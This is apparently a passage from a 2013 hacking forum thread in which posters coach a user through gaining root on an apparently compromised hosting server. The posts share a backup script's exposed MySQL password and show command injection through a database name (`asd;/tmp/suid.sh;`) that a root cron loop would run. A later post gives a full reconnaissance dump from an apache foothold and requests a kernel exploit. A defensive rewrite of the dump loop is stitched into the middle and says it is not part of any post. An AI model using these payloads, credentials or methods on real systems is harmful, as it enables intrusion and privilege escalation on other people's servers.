30.07.2013, 20:56   #911
chupakabra
Joined: 09.12.2011
Posts: 47
Reputation: 5

Kamnupre
ls -lia /usr/local/bin/; cat /usr/local/bin/backup.sh
30.07.2013, 21:13   #912
Kamnupre
Joined: 09.06.2013
Posts: 13
Reputation: -1

Quote:
Originally posted by chupakabra
Kamnupre
ls -lia /usr/local/bin/; cat /usr/local/bin/backup.sh
Code:
total 12
11125621 drwxr-xr-x  2 root root 4096 Jun 26  2012 .
11125619 drwxr-xr-x 12 root root 4096 Apr 20  2012 ..
11130001 -rwxr-xr-x  1 root root 1356 Jun 26  2012 backup.sh
#!/bin/bash

dir=`hostname`
host='HIDE'
rdiff='/usr/bin/rdiff-backup --remote-tempdir tmp --exclude-special-files --ssh-no-compression --no-compression'
keep=14B
rdiff_remove="/usr/bin/ssh $host /usr/bin/rdiff-backup --verbosity 2 --force --remove-older-than $keep"
vhosts_dir='/var/www/vhosts'
remote_config="$dir/config"
remote_vhosts="$dir/vhosts"
#grant all on *.* to mysql_backup@localhost identified by 'dfK286';
DB_ACCESS="-u mysql_backup -pdfK286"
BASES=`/bin/echo "SHOW DATABASES" | /usr/bin/mysql $DB_ACCESS | grep -v Database | grep -v information_schema`
BASES_PATH=/var/backup/db
remote_bases="$dir/db"
mysqldump="/usr/bin/mysqldump --force --quick --default-character-set=utf8 $DB_ACCESS"

ssh -o StrictHostKeyChecking=no $host mkdir -p $dir

ssh $host mkdir -p $remote_config
$rdiff --include-globbing-filelist-stdin --exclude '*' / $host::$remote_config <<EOF
/etc/*
/var/spool/cron/*
/var/log/rpmpkgs
/usr/local/bin/backup.sh
/var/named/chroot/etc
/var/named/chroot/var/named
EOF
$rdiff_remove $remote_config

ssh $host mkdir -p $remote_vhosts
for a in `ls -1 $vhosts_dir`;do
$rdiff $vhosts_dir/$a $host::$remote_vhosts/$a
$rdiff_remove $remote_vhosts/$a
done

mkdir -p $BASES_PATH
for base in $BASES; do
    $mysqldump $base > $BASES_PATH/$base.sql
done

$rdiff $BASES_PATH $host::$remote_bases
$rdiff_remove $remote_bases
31.07.2013, 10:36   #913
SynQ
Joined: 11.07.2010
Posts: 953
Reputation: 352

Kamnupre
There's the mysql password. Now:

Code:
BASES=`/bin/echo "SHOW DATABASES" | /usr/bin/mysql $DB_ACCESS | grep -v Database | grep -v information_schema`
...
for base in $BASES; do
    $mysqldump $base > $BASES_PATH/$base.sql
Play around with creating a database so that its name contains something like "name;/tmp/my-script-to-root-this-box.sh"
If it works, and mysql lets you use such special characters in the database name, don't forget to delete $BASES_PATH/$base.sql afterwards.

PS Instead of ";" you can try \r, \n, etc.

Last edited by SynQ; 31.07.2013 at 10:38.
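A defensive rewrite of the database dump loop from the backup.sh posted above, added here as an example and not part of any post: names returned by SHOW DATABASES are checked against an allowlist before they reach a command line or an output path, every expansion is quoted, and the credentials come from a root-only option file instead of the world-readable script body. The function names and the /root/.backup.cnf path are assumptions.

```shell
#!/bin/sh
# Added example, not code from the thread. Function names and the
# /root/.backup.cnf path are assumptions made for illustration.
LC_ALL=C; export LC_ALL     # make the A-Z / a-z ranges below byte-exact

# Assumed option file, mode 0600, owned by root, with a [client] section
# holding user and password, so neither appears in the script or in ps output.
BACKUP_CNF=${BACKUP_CNF:-/root/.backup.cnf}

# Allowlist check: 1-64 characters from [A-Za-z0-9_-], not starting with '-'.
is_safe_db_name() {
    case $1 in
        '' | -*)           return 1 ;;  # empty, or would be parsed as an option
        *[!A-Za-z0-9_-]*)  return 1 ;;  # any other byte: space, ';', '/', '\', ...
    esac
    [ "${#1}" -le 64 ]
}

# Replace every byte outside a safe set with '?' before a name is logged.
printable() {
    printf '%s' "$1" | tr -c 'A-Za-z0-9_.-' '[?*]'
}

# One database name per line, no header row.
list_databases() {
    mysql --defaults-extra-file="$BACKUP_CNF" --batch --skip-column-names \
          -e 'SHOW DATABASES'
}

dump_one() {
    mysqldump --defaults-extra-file="$BACKUP_CNF" --force --quick \
              --default-character-set=utf8 "$1"
}

# Reads one database name per line on stdin, writes <out_dir>/<name>.sql.
# Returns 0 if every name was accepted and dumped, 1 otherwise, so that
# cron mail or monitoring notices an unexpected name.
dump_all() {
    out_dir=$1
    status=0
    mkdir -p "$out_dir" || return 1
    while IFS= read -r name; do
        [ "$name" = information_schema ] && continue
        if ! is_safe_db_name "$name"; then
            echo "backup: skipping unexpected database name: $(printable "$name")" >&2
            status=1
            continue
        fi
        # Dumps are created readable by the owner only.
        ( umask 077; dump_one "$name" < /dev/null > "$out_dir/$name.sql" ) || status=1
    done
    return "$status"
}

# Run the backup only when asked to, so the file can also be sourced.
if [ "${1:-}" = run ]; then
    list_databases | dump_all /var/backup/db
fi
```

The backup account in the original script holds `grant all on *.*`; a dump-only account needs far less, and without CREATE it cannot add databases at all.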
31.07.2013, 13:12   #914
chupakabra
Joined: 09.12.2011
Posts: 47
Reputation: 5

SynQ +1

Code:
mysql -u mysql_backup -pdfK286
Code:
mysql> create database `asd;/tmp/suid.sh;`;
Query OK, 1 row affected (0.00 sec)

mysql> show databases;
+----------------------+
| Database             |
+----------------------+
| information_schema   |
| asd;/tmp/suid.sh;    |
...

Last edited by chupakabra; 31.07.2013 at 13:16.
31.07.2013, 14:17   #915
Kamnupre
Joined: 09.06.2013
Posts: 13
Reputation: -1

I enter mysql -u mysql_backup -p dfK286
The terminal hangs.
31.07.2013, 14:25   #916
b3
Joined: 18.08.2010
Posts: 353
Reputation: 105

Try it like this
Quote:
echo 'create database `asd;/tmp/suid.sh;`;' | mysql -u mysql_backup -pdfK286
03.08.2013, 10:14   #917
nomad
Joined: 23.07.2010
Posts: 179
Reputation: 7

There seems to be a video on YouTube of rooting this kernel, but I haven't seen a public exploit. Maybe someone has one?
Code:
**************************************************
*             general information                *
*                                                *
**************************************************
[+]id:
uid=48(apache) gid=48(apache) groups=48(apache)
[+]uanme -a:
Linux web.hoster.ru 2.6.18-194.32.1.el5PAE #1 SMP Wed Jan 5 18:43:13 EST 2011 i686 i686 i386 GNU/Linux

[+]cat /proc/version:
Linux version 2.6.18-194.32.1.el5PAE (admin@builder10.centos.org) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Wed Jan 5 18:43:13 EST 2011

[+]cat /etc/issue:
Hoster (\n)

CentOS release 5.9 (Final)
Kernel \r on an \m


[+]cat /etc/issue.net:
CentOS release 5.9 (Final)
Kernel \r on an \m
Redhat Release: CentOS release 5.9 (Final)

[+]who online (w):
 10:30:09 up 855 days, 17:17,  0 users,  load average: 3.53, 2.81, 2.40
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT


[+]mount:
/dev/mapper/hoster-root on / type ext3 (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/md0 on /boot type ext3 (rw)
tmpfs on /dev/shm type tmpfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw)
nfsd on /proc/fs/nfsd type nfsd (rw)

[+]df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/mapper/hoster-root
                      288G  268G   14G  96% /
/dev/md0              243M   19M  222M   8% /boot
tmpfs                 6.0G     0  6.0G   0% /dev/shm

[+]cat /etc/fstab
/dev/hoster/root         /                       ext3    defaults        1 1
/dev/md0                /boot                   ext3    defaults        1 2
tmpfs                   /dev/shm                tmpfs   defaults        0 0
devpts                  /dev/pts                devpts  gid=5,mode=620  0 0
sysfs                   /sys                    sysfs   defaults        0 0
proc                    /proc                   proc    defaults        0 0
/dev/hoster/swap         swap                    swap    defaults        0 0
**************************************************
*             security fails                     *
*                                                *
**************************************************
[+]mmap_min_addr:
[+]Parse /etc for Writeable files
[+] check /etc/shadow PERM
-r-------- 1 root root 1.3K Apr  8  2011 /etc/shadow
[+] check /etc/passwd PERM
-rw-r--r-- 1 root root 2.1K Jan 29  2013 /etc/passwd
[+]FHS root (ls -lha /):
total 94K
drwxr-xr-x  21 root root 4.0K Jun 11 16:54 .
drwxr-xr-x  21 root root 4.0K Jun 11 16:54 ..
-rw-r--r--   1 root root    0 Mar 31  2011 .autofsck
-rw-r--r--   1 root root    0 May 16  2008 .autorelabel
drwxr-xr-x   2 root root 4.0K Jul 17 04:06 bin
drwxr-xr-x   4 root root 6.0K Jul 16 12:41 boot
drwxr-xr-x  11 root root 3.4K Jan 29  2013 dev
drwxr-xr-x  74 root root 4.0K Aug  2 04:04 etc
drwxr-xr-x   8 root root 4.0K May 11  2011 home
drwxr-xr-x  13 root root 4.0K Jun 25 04:08 lib
drwx------   2 root root  16K May 15  2008 lost+found
drwxr-xr-x   2 root root 4.0K May 11  2011 media
drwxr-xr-x   2 root root 4.0K May 11  2011 mnt
drwxr-xr-x   6 root root 4.0K Jun  6 01:14 opt
dr-xr-xr-x 266 root root    0 May 11  2011 proc
drwxr-x---   6 root root 4.0K Jun  6 00:36 root
drwxr-xr-x   2 root root  12K Jun 19 04:07 sbin
drwxr-xr-x   2 root root 4.0K May 11  2011 selinux
drwxr-xr-x   2 root root 4.0K May 11  2011 srv
drwxr-xr-x  11 root root    0 May 11  2011 sys
drwxrwxrwt   4 root root 4.0K Aug  3 10:30 tmp
drwxr-xr-x  15 root root 4.0K May 12  2011 usr
drwxr-xr-x  24 root root 4.0K May 12  2011 var
[+]Search core dumps...
Sudo version 1.7.2p1
**************************************************
*             av, firewalls                      *
*                                                *
**************************************************
chkrootkit:
rkhunter:
clamav:
**************************************************
*             Usefull                            *
*                                                *
**************************************************
[+] Python
[+] Php
PHP 5.3.6 (cli) (built: Apr  5 2011 00:29:40) 
Copyright (c) 1997-2011 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2011 Zend Technologies
[+] Perl

This is perl, v5.8.8 built for i386-linux-thread-multi

Copyright 1987-2006, Larry Wall

Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.

Complete documentation for Perl, including FAQ lists, should be found on
this system using "man perl" or "perldoc perl".  If you have access to the
Internet, point your browser at http://www.perl.org/, the Perl Home Page.

[+]gcc -v
[+]Ruby -v
**************************************************
*             users info                         *
*                                                *
**************************************************
[+] All users:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pcap:x:77:77::/var/arpwatch:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
user:x:500:500:Nik:/home/user:/bin/bash
fuks:x:501:501:Is:/home/fuks:/bin/bash
hoster:x:502:502:V:/home/hoster:/bin/bash
vmail:x:1000:12::/var/spool/vmail:/bin/false
ntp:x:38:38::/etc/ntp:/sbin/nologin
souser:x:1001:1001:Spamooborona filter:/var/yamail:/bin/bash
named:x:25:25:Named:/var/named:/sbin/nologin
giver:x:1002:1002::/home/giver:/bin/bash
webmaster:x:600:600:webmaster:/home/webmaster:/bin/bash
zabbix:x:100:101:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
memcached:x:101:102:Memcached daemon:/var/run/memcached:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
clamav:x:102:103:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
tomcat:x:46:99:Tomcat JVM user.:/opt/tomcat/temp:/sbin/nologin
irotor:x:1003:1003::/home/irotor:/bin/bash

[+]Chek HOMEs for users with UID>500:

[+]check perm user(uid=500;gid=500) HOME=/home/user:
drwx------ 9 user user 4.0K 2011-08-02 15:31:39.000000000 +0400 /home/user
[+]check perm fuks(uid=501;gid=501) HOME=/home/fuks:
drwx------ 12 fuks fuks 4.0K 2013-06-24 18:52:42.000000000 +0400 /home/fuks
[+]check perm hoster(uid=502;gid=502) HOME=/home/hoster:
drwx------ 4 hoster hoster 4.0K 2008-11-27 18:12:43.000000000 +0300 /home/hoster
[+]check perm vmail(uid=1000;gid=12) HOME=/var/spool/vmail:
drwxr-xr-x 8 vmail mail 4.0K 2010-04-23 18:46:36.000000000 +0400 /var/spool/vmail
[+]check perm souser(uid=1001;gid=1001) HOME=/var/yamail:
drwxr-xr-x 2 root root 4.0K 2008-09-11 17:12:48.000000000 +0400 /var/yamail
[+]check perm giver(uid=1002;gid=1002) HOME=/home/giver:
drwx------ 11 giver giver 4.0K 2011-09-26 15:00:26.000000000 +0400 /home/giver
[+]check perm webmaster(uid=600;gid=600) HOME=/home/webmaster:
drwx------ 11 webmaster webmaster 4.0K 2013-06-11 19:22:20.000000000 +0400 /home/webmaster
[+]check perm nfsnobody(uid=65534;gid=65534) HOME=/var/lib/nfs:
drwxr-xr-x 5 root root 4.0K 2013-08-03 04:31:49.000000000 +0400 /var/lib/nfs
[+]check perm irotor(uid=1003;gid=1003) HOME=/home/irotor:
drwx------ 3 irotor irotor 4.0K 2011-04-08 20:46:47.000000000 +0400 /home/irotor
**************************************************
*             library info                       *
*                                                *
**************************************************
[+]LIBC:
2013-05-31 /lib/libc-2.5.so
[+]ALL from /lib /lib64 (sort -u):
-r--r--r--  1 root root  45K 2012-02-22 21:26:24.000000000 +0400 libdevmapper-event.a
-r--r--r--  1 root root 3.9M 2013-01-09 13:00:01.000000000 +0400 liblvm2cmd.a
-r--r--r--  1 root root 485K 2012-02-22 21:26:17.000000000 +0400 libdevmapper.a
-r-xr-xr-x  1 root root  20K 2011-07-22 09:07:40.000000000 +0400 libdmraid-events-isw.so.1.0.0.rc13-17
-r-xr-xr-x  1 root root  20K 2012-02-22 21:26:32.000000000 +0400 libdevmapper-event.so.1.02
-r-xr-xr-x  1 root root 162K 2012-02-22 21:26:32.000000000 +0400 libdevmapper.so.1.02
-r-xr-xr-x  1 root root 217K 2011-07-22 09:07:40.000000000 +0400 libdmraid.so.1.0.0.rc13-17
-r-xr-xr-x  1 root root 5.0K 2013-01-09 13:00:04.000000000 +0400 libdevmapper-event-lvm2.so.2.02
-r-xr-xr-x  1 root root 858K 2013-01-09 13:00:03.000000000 +0400 liblvm2cmd.so.2.02
-rw-r--r--  1 root root   65 2013-03-05 15:27:05.000000000 +0400 .libcrypto.so.0.9.8e.hmac
-rw-r--r--  1 root root   65 2013-03-05 15:27:05.000000000 +0400 .libssl.so.0.9.8e.hmac
-rwxr-xr-x  1 root root  10K 2013-01-09 09:30:33.000000000 +0400 libpam_misc.so.0.81.2
-rwxr-xr-x  1 root root  12K 2007-03-14 21:15:10.000000000 +0300 libcap.so.1.10
-rwxr-xr-x  1 root root  12K 2009-03-25 04:52:17.000000000 +0300 libgmodule-2.0.so.0.1200.3
-rwxr-xr-x  1 root root  13K 2007-01-06 16:01:17.000000000 +0300 libtermcap.so.2.0.8
-rwxr-xr-x  1 root root  14K 2013-05-31 02:19:03.000000000 +0400 libanl-2.5.so
-rwxr-xr-x  1 root root  15K 2013-05-31 02:19:05.000000000 +0400 libutil-2.5.so
-rwxr-xr-x  1 root root  16K 2007-01-06 08:12:05.000000000 +0300 libattr.so.1.1.0
-rwxr-xr-x  1 root root  16K 2009-03-25 04:52:17.000000000 +0300 libgthread-2.0.so.0.1200.3
-rwxr-xr-x  1 root root  16K 2013-05-09 15:10:58.000000000 +0400 libuuid.so.1.2
-rwxr-xr-x  1 root root  17K 2013-05-31 02:19:03.000000000 +0400 libSegFault.so
-rwxr-xr-x  1 root root  20K 2011-07-22 09:07:41.000000000 +0400 libdmraid-events-isw.so.1.0.0.rc13
-rwxr-xr-x  1 root root  21K 2013-05-09 15:10:58.000000000 +0400 libss.so.2.0
-rwxr-xr-x  1 root root  21K 2013-05-31 02:19:04.000000000 +0400 libdl-2.5.so
-rwxr-xr-x  1 root root  22K 2013-05-09 15:10:58.000000000 +0400 libe2p.so.2.3
-rwxr-xr-x  1 root root  22K 2013-05-31 02:19:04.000000000 +0400 libnss_dns-2.5.so
-rwxr-xr-x  1 root root  23K 2013-05-31 02:19:05.000000000 +0400 libnss_hesiod-2.5.so
-rwxr-xr-x  1 root root  26K 2012-02-22 17:57:47.000000000 +0400 libacl.so.1.1.0
-rwxr-xr-x  1 root root  33K 2009-09-22 02:37:30.000000000 +0400 libwrap.so.0.7.6
-rwxr-xr-x  1 root root  35K 2013-05-31 02:19:05.000000000 +0400 libthread_db-1.0.so
-rwxr-xr-x  1 root root  36K 2013-05-31 02:19:04.000000000 +0400 libnss_compat-2.5.so
-rwxr-xr-x  1 root root  38K 2013-01-09 10:09:06.000000000 +0400 libvolume_id.so.0.66.0
-rwxr-xr-x  1 root root  38K 2013-05-09 15:10:58.000000000 +0400 libblkid.so.1.0
-rwxr-xr-x  1 root root  44K 2013-01-09 09:30:33.000000000 +0400 libpam.so.0.81.5
-rwxr-xr-x  1 root root  45K 2013-05-31 02:19:04.000000000 +0400 libcrypt-2.5.so
-rwxr-xr-x  1 root root  46K 2013-01-08 22:20:59.000000000 +0400 libgcc_s-4.1.2-20080825.so.1
-rwxr-xr-x  1 root root  46K 2013-05-31 02:19:05.000000000 +0400 libnss_nis-2.5.so
-rwxr-xr-x  1 root root  48K 2013-05-31 02:19:05.000000000 +0400 librt-2.5.so
-rwxr-xr-x  1 root root  50K 2013-05-31 02:19:04.000000000 +0400 libnss_files-2.5.so
-rwxr-xr-x  1 root root  54K 2013-01-09 09:43:31.000000000 +0400 libproc-3.2.7.so
-rwxr-xr-x  1 root root  55K 2013-05-31 02:19:05.000000000 +0400 libnss_nisplus-2.5.so
-rwxr-xr-x  1 root root  58K 2012-02-22 19:10:06.000000000 +0400 libauparse.so.0.0.0
-rwxr-xr-x  1 root root  74K 2012-07-17 12:32:17.000000000 +0400 libz.so.1.2.3
-rwxr-xr-x  1 root root  83K 2013-05-31 02:19:05.000000000 +0400 libresolv-2.5.so
-rwxr-xr-x  1 root root  92K 2011-03-06 07:51:56.000000000 +0300 libselinux.so.1
-rwxr-xr-x  1 root root  95K 2012-02-22 19:10:06.000000000 +0400 libaudit.so.0.0.0
-rwxr-xr-x  1 root root 1.3M 2013-03-05 15:27:05.000000000 +0400 libcrypto.so.0.9.8e
-rwxr-xr-x  1 root root 1.7M 2013-05-31 02:19:04.000000000 +0400 libc-2.5.so
-rwxr-xr-x  1 root root 108K 2013-05-31 02:19:04.000000000 +0400 libnsl-2.5.so
-rwxr-xr-x  1 root root 113K 2013-05-09 15:10:58.000000000 +0400 libext2fs.so.2.4
-rwxr-xr-x  1 root root 127K 2011-03-31 04:08:14.000000000 +0400 libpcre.so.0.0.1
-rwxr-xr-x  1 root root 128K 2013-05-31 02:19:03.000000000 +0400 ld-2.5.so
-rwxr-xr-x  1 root root 133K 2012-06-13 18:35:31.000000000 +0400 libexpat.so.0.5.0
-rwxr-xr-x  1 root root 135K 2013-05-31 02:19:05.000000000 +0400 libpthread-2.5.so
-rwxr-xr-x  1 root root 156K 2009-09-04 02:49:09.000000000 +0400 libsemanage.so.1
-rwxr-xr-x  1 root root 188K 2013-05-31 02:19:04.000000000 +0400 libcidn-2.5.so
-rwxr-xr-x  1 root root 212K 2013-05-31 02:19:04.000000000 +0400 libm-2.5.so
-rwxr-xr-x  1 root root 215K 2011-07-22 09:07:41.000000000 +0400 libdmraid.so.1.0.0.rc13
-rwxr-xr-x  1 root root 240K 2010-03-31 12:26:18.000000000 +0400 libsepol.so.1
-rwxr-xr-x  1 root root 248K 2011-08-11 21:33:53.000000000 +0400 libdbus-1.so.3.4.0
-rwxr-xr-x  1 root root 254K 2009-03-25 04:52:17.000000000 +0300 libgobject-2.0.so.0.1200.3
-rwxr-xr-x  1 root root 294K 2013-03-05 15:27:05.000000000 +0400 libssl.so.0.9.8e
-rwxr-xr-x  1 root root 630K 2009-03-25 04:52:17.000000000 +0300 libglib-2.0.so.0.1200.3
-rwxr-xr-x  1 root root 7.5K 2013-05-31 02:19:03.000000000 +0400 libBrokenLocale-2.5.so
-rwxr-xr-x  1 root root 7.7K 2007-01-06 10:57:38.000000000 +0300 libkeyutils-1.2.so
-rwxr-xr-x  1 root root 7.7K 2013-05-09 15:10:58.000000000 +0400 libcom_err.so.2.1
-rwxr-xr-x  1 root root 9.7K 2013-01-09 09:30:33.000000000 +0400 libpamc.so.0.81.0
-rwxr-xr-x  1 root root 989K 2010-07-12 20:11:02.000000000 +0400 libdb-4.3.so
/lib/:
drwxr-xr-x  2 root root 4.0K 2012-11-06 17:30:36.000000000 +0400 iptables
drwxr-xr-x  2 root root 4.0K 2013-01-29 13:36:04.000000000 +0400 device-mapper
drwxr-xr-x  2 root root 4.0K 2013-01-29 13:36:34.000000000 +0400 firmware
drwxr-xr-x  2 root root 4.0K 2013-05-29 13:33:35.000000000 +0400 bdevid
drwxr-xr-x  2 root root 4.0K 2013-06-04 04:07:57.000000000 +0400 dbus-1
drwxr-xr-x  3 root root 4.0K 2013-01-29 13:35:51.000000000 +0400 security
drwxr-xr-x  3 root root 4.0K 2013-05-31 01:39:08.000000000 +0400 i686
drwxr-xr-x  3 root root 4.0K 2013-06-03 04:25:32.000000000 +0400 rtkaio
drwxr-xr-x  3 root root 4.0K 2013-06-04 04:07:56.000000000 +0400 udev
drwxr-xr-x  4 root root 4.0K 2013-07-16 12:41:48.000000000 +0400 modules
drwxr-xr-x  6 root root 4.0K 2013-01-09 07:15:07.000000000 +0400 kbd
drwxr-xr-x 13 root root 4.0K 2013-06-25 04:08:32.000000000 +0400 .
drwxr-xr-x 21 root root 4.0K 2013-06-11 16:54:24.000000000 +0400 ..
lrwxrwxrwx  1 root root    9 2013-06-03 04:25:32.000000000 +0400 ld-linux.so.2 -> ld-2.5.so
lrwxrwxrwx  1 root root   11 2013-06-03 04:25:32.000000000 +0400 libc.so.6 -> libc-2.5.so
lrwxrwxrwx  1 root root   11 2013-06-03 04:25:32.000000000 +0400 libm.so.6 -> libm-2.5.so
lrwxrwxrwx  1 root root   12 2013-05-20 14:40:28.000000000 +0400 libss.so.2 -> libss.so.2.0
lrwxrwxrwx  1 root root   12 2013-06-03 04:25:32.000000000 +0400 libdl.so.2 -> libdl-2.5.so
lrwxrwxrwx  1 root root   12 2013-06-03 04:25:32.000000000 +0400 librt.so.1 -> librt-2.5.so
lrwxrwxrwx  1 root root   13 2013-01-29 13:35:42.000000000 +0400 libz.so.1 -> libz.so.1.2.3
lrwxrwxrwx  1 root root   13 2013-01-29 13:36:59.000000000 +0400 libz.so -> libz.so.1.2.3
lrwxrwxrwx  1 root root   13 2013-05-20 14:40:28.000000000 +0400 libe2p.so.2 -> libe2p.so.2.3
lrwxrwxrwx  1 root root   13 2013-06-03 04:25:32.000000000 +0400 libanl.so.1 -> libanl-2.5.so
lrwxrwxrwx  1 root root   13 2013-06-03 04:25:32.000000000 +0400 libnsl.so.1 -> libnsl-2.5.so
lrwxrwxrwx  1 root root   14 2011-03-21 17:17:31.000000000 +0300 libcap.so.1 -> libcap.so.1.10
lrwxrwxrwx  1 root root   14 2013-01-29 13:36:24.000000000 +0400 cpp -> ../usr/bin/cpp
lrwxrwxrwx  1 root root   14 2013-05-20 14:40:28.000000000 +0400 libuuid.so.1 -> libuuid.so.1.2
lrwxrwxrwx  1 root root   14 2013-06-03 04:25:32.000000000 +0400 libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx  1 root root   14 2013-06-03 04:25:32.000000000 +0400 libutil.so.1 -> libutil-2.5.so
lrwxrwxrwx  1 root root   15 2012-03-15 04:23:01.000000000 +0400 libacl.so.1 -> libacl.so.1.1.0
lrwxrwxrwx  1 root root   15 2013-05-20 14:40:28.000000000 +0400 libblkid.so.1 -> libblkid.so.1.0
lrwxrwxrwx  1 root root   15 2013-06-03 04:25:32.000000000 +0400 libcrypt.so.1 -> libcrypt-2.5.so
lrwxrwxrwx  1 root root   16 2011-03-21 17:17:31.000000000 +0300 libattr.so.1 -> libattr.so.1.1.0
lrwxrwxrwx  1 root root   16 2011-03-21 17:17:31.000000000 +0300 libwrap.so.0 -> libwrap.so.0.7.6
lrwxrwxrwx  1 root root   16 2011-04-22 11:51:57.000000000 +0400 libpcre.so.0 -> libpcre.so.0.0.1
lrwxrwxrwx  1 root root   16 2013-01-29 13:35:51.000000000 +0400 libpam.so.0 -> libpam.so.0.81.5
lrwxrwxrwx  1 root root   16 2013-03-14 15:11:44.000000000 +0400 libssl.so.6 -> libssl.so.0.9.8e
lrwxrwxrwx  1 root root   16 2013-05-20 14:40:28.000000000 +0400 libext2fs.so.2 -> libext2fs.so.2.4
lrwxrwxrwx  1 root root   16 2013-06-03 04:25:32.000000000 +0400 libresolv.so.2 -> libresolv-2.5.so
lrwxrwxrwx  1 root root   17 2012-03-15 04:22:55.000000000 +0400 libaudit.so.0 -> libaudit.so.0.0.0
lrwxrwxrwx  1 root root   17 2012-06-14 15:46:41.000000000 +0400 libexpat.so.0 -> libexpat.so.0.5.0
lrwxrwxrwx  1 root root   17 2013-01-29 13:35:51.000000000 +0400 libpamc.so.0 -> libpamc.so.0.81.0
lrwxrwxrwx  1 root root   17 2013-05-20 14:40:28.000000000 +0400 libcom_err.so.2 -> libcom_err.so.2.1
lrwxrwxrwx  1 root root   17 2013-06-03 04:25:32.000000000 +0400 libnss_dns.so.2 -> libnss_dns-2.5.so
lrwxrwxrwx  1 root root   17 2013-06-03 04:25:32.000000000 +0400 libnss_nis.so.2 -> libnss_nis-2.5.so
lrwxrwxrwx  1 root root   17 2013-06-03 04:25:32.000000000 +0400 libpthread.so.0 -> libpthread-2.5.so
lrwxrwxrwx  1 root root   18 2011-03-21 17:17:31.000000000 +0300 libkeyutils.so.1 -> libkeyutils-1.2.so
lrwxrwxrwx  1 root root   18 2011-09-18 00:35:43.000000000 +0400 libdbus-1.so.3 -> libdbus-1.so.3.4.0
lrwxrwxrwx  1 root root   18 2013-01-29 13:36:04.000000000 +0400 liblvm2cmd.so -> liblvm2cmd.so.2.02
lrwxrwxrwx  1 root root   19 2011-03-21 17:17:31.000000000 +0300 libtermcap.so.2 -> libtermcap.so.2.0.8
lrwxrwxrwx  1 root root   19 2012-03-15 04:22:55.000000000 +0400 libauparse.so.0 -> libauparse.so.0.0.0
lrwxrwxrwx  1 root root   19 2013-03-14 15:11:44.000000000 +0400 libcrypto.so.6 -> libcrypto.so.0.9.8e
lrwxrwxrwx  1 root root   19 2013-06-03 04:25:32.000000000 +0400 libnss_files.so.2 -> libnss_files-2.5.so
lrwxrwxrwx  1 root root   19 2013-06-03 04:25:32.000000000 +0400 libthread_db.so.1 -> libthread_db-1.0.so
lrwxrwxrwx  1 root root   20 2012-03-15 04:22:56.000000000 +0400 libdevmapper.so -> libdevmapper.so.1.02
lrwxrwxrwx  1 root root   20 2013-06-03 04:25:32.000000000 +0400 libnss_compat.so.2 -> libnss_compat-2.5.so
lrwxrwxrwx  1 root root   20 2013-06-03 04:25:32.000000000 +0400 libnss_hesiod.so.2 -> libnss_hesiod-2.5.so
lrwxrwxrwx  1 root root   21 2013-01-29 13:35:51.000000000 +0400 libpam_misc.so.0 -> libpam_misc.so.0.81.2
lrwxrwxrwx  1 root root   21 2013-06-03 04:25:32.000000000 +0400 libnss_nisplus.so.2 -> libnss_nisplus-2.5.so
lrwxrwxrwx  1 root root   22 2013-01-29 13:36:03.000000000 +0400 libvolume_id.so.0 -> libvolume_id.so.0.66.0
lrwxrwxrwx  1 root root   22 2013-03-14 15:11:44.000000000 +0400 .libssl.so.6.hmac -> .libssl.so.0.9.8e.hmac
lrwxrwxrwx  1 root root   22 2013-06-03 04:25:32.000000000 +0400 libBrokenLocale.so.1 -> libBrokenLocale-2.5.so
lrwxrwxrwx  1 root root   23 2011-03-21 17:17:31.000000000 +0300 libglib-2.0.so.0 -> libglib-2.0.so.0.1200.3
lrwxrwxrwx  1 root root   23 2011-09-18 00:35:43.000000000 +0400 libdmraid.so -> libdmraid.so.1.0.0.rc13
lrwxrwxrwx  1 root root   25 2013-03-14 15:11:44.000000000 +0400 .libcrypto.so.6.hmac -> .libcrypto.so.0.9.8e.hmac
lrwxrwxrwx  1 root root   26 2011-03-21 17:17:31.000000000 +0300 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.1200.3
lrwxrwxrwx  1 root root   26 2011-03-21 17:17:31.000000000 +0300 libgobject-2.0.so.0 -> libgobject-2.0.so.0.1200.3
